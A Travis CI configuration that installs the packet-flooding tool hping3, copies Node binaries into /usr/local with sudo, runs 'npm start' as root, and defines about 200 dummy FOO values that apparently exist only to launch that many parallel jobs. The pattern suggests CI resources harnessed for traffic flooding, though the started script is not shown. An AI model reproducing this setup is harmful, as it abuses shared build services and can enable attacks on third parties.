language: node_js
node_js:
  - "8"
sudo: required
script:
  - sudo apt-get install hping3
  - 'n=$(which node); n=${n%/bin/node}; chmod -R 755 $n/bin/*; sudo cp -r $n/{bin,lib,share} /usr/local'
  - sudo npm start
env:
  - FOO=H8qeR93qz0kaipEKBc80
  - FOO=d8OUV4qNmdruCMEabixc
  - FOO=YgFhUphYFppndSgBQ9KP
  - FOO=yv4NCA8L4u7nwDy1Fxk9
  - FOO=s1F8zDoW7x6JRkaxFiR9
  - FOO=dpyj1P5ctWrdtC3CyT7P
  - FOO=ZBf2A7IRBcMNdoFBX3Gh
  - FOO=IeAlLeaWsobrXW9ZWkXv
  - FOO=DkiuG4dxtb8yc2Iq8GTI
  - FOO=4dKOpQfjIfrBzXtUm6Ke
  - FOO=SgM7HCJX8zXqZw5EuHDG
  - FOO=fXRP0vSmaKKSrCcrPAlV
  - FOO=dEl7SNWqZQiEb6Bqzyv7
  - FOO=70uTPZhoSSN3fMoOG6QP
  - FOO=B14UhJRFX3s5FU6XQwWt
  - FOO=aqr8WNzquozLtiArqgGb
  - FOO=D8o0KpDpUWsGZNo9FN1I
  - FOO=NgvSwYqWVh4eeP2bOa4Y
  - FOO=jsGGlIz1TbIRlW7Z9hQy
  - FOO=mzuUDRG8owfgBaR812gB
  - FOO=nJYHtj8PkVPY161UeoM9
  - FOO=sygWdqzKzCo9DwOxgn0K
  - FOO=secyrKkfNY1DkABmhwK4
  - FOO=LWbx7gvPwW0TJnjt3G5N
  - FOO=QtaRoPxlOkntw5K3vUUx
  - FOO=CPyX99HruUevnos013JN
  - FOO=QSMTEfS6VJxy3FjLNw7S
  - FOO=5rFc52mcI6pX9izk7VdT
  - FOO=QR0sXly9Lwb0rh3mLZ7o
  - FOO=kbVIHVngbeaFZSRvvW7i
  - FOO=16OzsLJs9IULx3RSoFiv
  - FOO=zYLhExaK2DES1pebOqtc
  - FOO=7SupKCLd07I67dPq5Abw
  - FOO=dwlfXXjzHIx6EvOD6IxC
  - FOO=8n1aX4KuZNs6Yjw9J6kP
  - FOO=fxNeWfUfizrkhLf0gqy7
  - FOO=4N2vx7C2KRQC5nnZNM38
  - FOO=XLRFrOgNCeb3PJ8qipxw
  - FOO=JrCwN5pWiXQDCdLm6NHw
  - FOO=2j36tDZ2majyI1oY9l2Z
  - FOO=F65FjqxDva45tkhyV8EJ
  - FOO=ueTABiig24JVlGA9GHuA
  - FOO=mT324vdNoENIRJTHBEIB
  - FOO=ndfk6c70t7sTeoRN0HZz
  - FOO=ZCrpofrWLrCa3YwUGfEW
  - FOO=AcI2PXXZw6zVel5d6wav
  - FOO=c26ARd7HBvEfNr1YlbY1
  - FOO=KwhRVlhJM8jqqIFN0oR5
  - FOO=A8h4DJuWadyP9N3c1Z5M
  - FOO=IYm1agRgIuQizqwP8hgq
  - FOO=vpfVuf2rrJ1G7TMqAGlz
  - FOO=B6mr7KWsPLD5aLnn9A7P
  - FOO=b2x2stWfPc32jwUUSerK
  - FOO=Qg1ldYIhys5WQSpBMhxg
  - FOO=t0MVQJEyOkdgHr6DdwJH
  - FOO=zWDF7YXl5yAdxa5Zbe9C
  - FOO=leJoIJNIonO1LqzhuCD5
  - FOO=HHrMFvm2yg2azHNMXv88
  - FOO=teEtgQiZ5TNtBlDspGpb
  - FOO=FNXEq5aOLRXwmkxk7pEi
  - FOO=NcObqTPNeUhk382XZEiQ
  - FOO=WuNB8wrWKGtA6cg5hPS7
  - FOO=o4DXfz4ja0XAlU4CF6LL
  - FOO=cmIng1LKf21MDhigX0tE
  - FOO=ya1rUYmNGCucqCutAY39
  - FOO=WFRwHVgB8VZh86HUtDxD
  - FOO=0FLdDQndl9thcffdCH1B
  - FOO=ti5D8hqd3pBqwELWlK2C
  - FOO=sMzaCe2mtNWtC6aYCQPM
  - FOO=ZO2eyxbYKZSXWUj9Embd
  - FOO=V98IhNEjB4cJ4RrWBnFG
  - FOO=LjSH3sBwCP9jcmOwxK0h
  - FOO=ekgj5bZUUvYDEiBcX4YV
  - FOO=JUDSpGk2bNdZJdsQWKos
  - FOO=JEyETF7cEEsu2EG5SG9k
  - FOO=OMLoAyyG00IBiuPeRRsS
  - FOO=qquTZR4370r6hMnI91wW
  - FOO=pGTxx0MowrUw0mYyQ6jI
  - FOO=3R8qEPzIv0Y2kQpwG9F7
  - FOO=24AbXchBGKpaVzW1R9uE
  - FOO=1apcvMqNmmi8rLpugBKe
  - FOO=gup4R2ui06f0iBDBPEI8
  - FOO=Cd0OIxNCmFHtlefHWS39
  - FOO=I8Hkb1y9FmhBHpdcTKYz
  - FOO=gzgNQoAFd6fRAt47RYch
  - FOO=UTfKqnqWkS8pZm3DfZDb
  - FOO=E1QdhHCnfd1ymKVX7vlG
  - FOO=s0uhOcDYDmysVxjaQWPk
  - FOO=Y6F9yhykkKOlGArHKYBF
  - FOO=V5wwwQrt1IOorVhGiDz6
  - FOO=7aehKwj62dxUS9ER1Lp3
  - FOO=ngrjISgVj8sYGR0SAFNv
  - FOO=EKQTaRoumCwphrDDOV0d
  - FOO=rb31zbuUiD92JN41tio7
  - FOO=gGB1R6DA3WYhKc3aiElC
  - FOO=89dtkIuza9taDZvFNFsC
  - FOO=YwqER0qyLZX0uXnwVOFB
  - FOO=5XFOArLXVeR5K9PFFWyO
  - FOO=KZNjeU64tzlJizE4Xnc4
  - FOO=JG9mqECsf7rL47dSPS3a
  - FOO=g2NMDxFFyR6FjrHjlMwa
  - FOO=ZxAmSdm51PmH2gEm5ZsI
  - FOO=HsfflHtGcrMYhAAMkS0o
  - FOO=Oilb2EddZJ4fftndNrRK
  - FOO=gq2XzZ9zqQX1Q6sw7PAv
  - FOO=zRQ4uEWj0AKNnuwtbGdQ
  - FOO=6hyCx1A0DpvHLrAsT4Tf
  - FOO=AodU6kKHq8beCiEolLTQ
  - FOO=d4AEdPa53KfX7G7R9FYq
  - FOO=h66VnF9dA07yNBIBf6uH
  - FOO=ZEIbiXz9LRnJIytY2Dhx
  - FOO=LDZEokR2SvGErK3oiie4
  - FOO=B1TLfWx7DxLNmoFLtwWJ
  - FOO=9cmD5GgwnHLikDDhmUZl
  - FOO=YSPuhWqZsqkjIDssth01
  - FOO=oRMHUaWKqPNIoqMfKWfr
  - FOO=37HoPJGB2tqBKn3J6yKc
  - FOO=fERz2iQWx8ejcCdpEF3V
  - FOO=U0VsoR8Pgg2DYoQFofYT
  - FOO=8ZLB46IEx6sumS4d40ZL
  - FOO=8xhAt7RPEJdgLHRO79td
  - FOO=fP1ihk4L2XH8pzqHwLsG
  - FOO=JSGXd9fF1GIqs6WwkO2b
  - FOO=VAZ2KQB2FWeTmyP2FYNZ
  - FOO=ETFLioJAF7ZvyqF0nb5n
  - FOO=zzM66PLz4GrVmjbrWrfP
  - FOO=eIm3KGlu2DLDy06V8H3U
  - FOO=lydh5QYQME3CoIcQjZ5F
  - FOO=ZK2ikuYARvGeiTT7a7Ar
  - FOO=xq8B3r6AuvpIGxih6yzu
  - FOO=a2f4O2wKw5CJRjYZTrfh
  - FOO=Ug9InFxn0CZyMG4cD9P2
  - FOO=3rYAgqOHjmY8Jls0fDFB
  - FOO=7YdxoOxDmmuUKepDeoVt
  - FOO=u1WyxycTRyvlO2x3RwCK
  - FOO=gxuipjs3bjo3JtkJlccv
  - FOO=cDMyrtZtSHSFMJl9kuhL
  - FOO=2kExi4np1emxEZaE4eVW
  - FOO=XZaC7dwRogBMGHm1nC3J
  - FOO=u3JFzXnai9NRKV2QPNWg
  - FOO=uYvdiBUk2USZLUijUXaW
  - FOO=H07wCcdYrPIHAopEiODj
  - FOO=1OO26yUbe1Ge7N9RV5la
  - FOO=FPG1wc02krhKIi3hBePl
  - FOO=jMUWyBgxwxdrbpBfZkrx
  - FOO=2IHIKcMtzIJSqtQyycZR
  - FOO=SL4Km35jSIlnPAoedz6c
  - FOO=PcAPvoJXblKLF8rGAjaH
  - FOO=nSpvwRKfj7E6KrROiATR
  - FOO=NdDjotlBwTyYiHdWBfG0
  - FOO=mD08URPlg7QwDh7G1XUn
  - FOO=Ov0bqlpK649fi07IV34R
  - FOO=yNbk82Gi0U5KD4wJfGeA
  - FOO=lSXYjf07w0zKsLrnxHxN
  - FOO=r0iL6cxb5ysR1acV7lie
  - FOO=3jJ0Jb7wumuOLgqXqXXJ
  - FOO=YEf3560MSSuUY3K6cwQv
  - FOO=7AQBEZNuUgvWkeamGuB2
  - FOO=h8aOUoJCj43ouFsmm3Bp
  - FOO=xmmpepvFOaSCXeNetjP7
  - FOO=M4sEL4ll1jENz8VElbyC
  - FOO=hPFkCsX93zv4QerIaZMu
  - FOO=QlFIaTRk9kIwPmJ9CfxJ
  - FOO=0K5Qz2ydPqoP9RuvcorY
  - FOO=O2gR6nf83a2BCgeg2XRX
  - FOO=ObXmLlhN7YHro5MoeN74
  - FOO=4ZBWwVRcUlBZLLeW1FJ4
  - FOO=efOZtajxdqFz3zLFptBn
  - FOO=axNtP3TGiWOkoA3CEBk6
  - FOO=fDq5618QYuTndL0VAgTm
  - FOO=e3NuCuoTS1mIqZyVrwhE
  - FOO=QNPleOUm4bV1eQoi9mjp
  - FOO=A5jZ5Jnsr0lCtMUUVbGa
  - FOO=a6IsGeOtMGlGDdbnSzOQ
  - FOO=KfNi3p5wapLizr2q47ls
  - FOO=JJzrQCx4E3Os7GzU0uwi
  - FOO=jMdxDBaynM8N1ZbFGVjM
  - FOO=K2R1tg2QYlHjBOrYyyMV
  - FOO=JjVeyAIvBYVsbvTNzuWS
  - FOO=vJxOxasBIZZd9osxBsHK
  - FOO=FtJt2xfo0Cuo0w1xTYsE
  - FOO=KWUoqgn7LjbZmNBnWDXv
  - FOO=zZBK6QmdaUWZsxqwgXT1
  - FOO=MpbXcVfbVWspr7GYGPLm
  - FOO=ywAwzlnyWftrnU74k541
  - FOO=68Px4FN2f4VCjZL3PLek
  - FOO=Y04DtIKLYEZc1G3XXObV
  - FOO=6tAhiqWBGgmZqUxgKxu7
  - FOO=1VAKnXRiDqSxjSCZ09o7
  - FOO=oEQsO44QJcwAbEp7vxoZ
  - FOO=cqPPEcy03XzauOzDs6fR
  - FOO=nTblSBEYb0XRVRLLgyIx
  - FOO=OcwDhgrEo6SD0UusUWrf
  - FOO=iUkqAHcotybyqR8XEJw0
  - FOO=0bz1QQx4Ka8w1xDcSKKr
  - FOO=qTjoVsvZL9hPr7yya8lO
  - FOO=mHhAIbOpcsrZkyhPrKkl
  - FOO=oQId5dhCHMjAjLa6oLlW
  - FOO=sCo2735j9U4qKtsoGK1w
  - FOO=Zhkaf1EY9ugf3MutNGxV
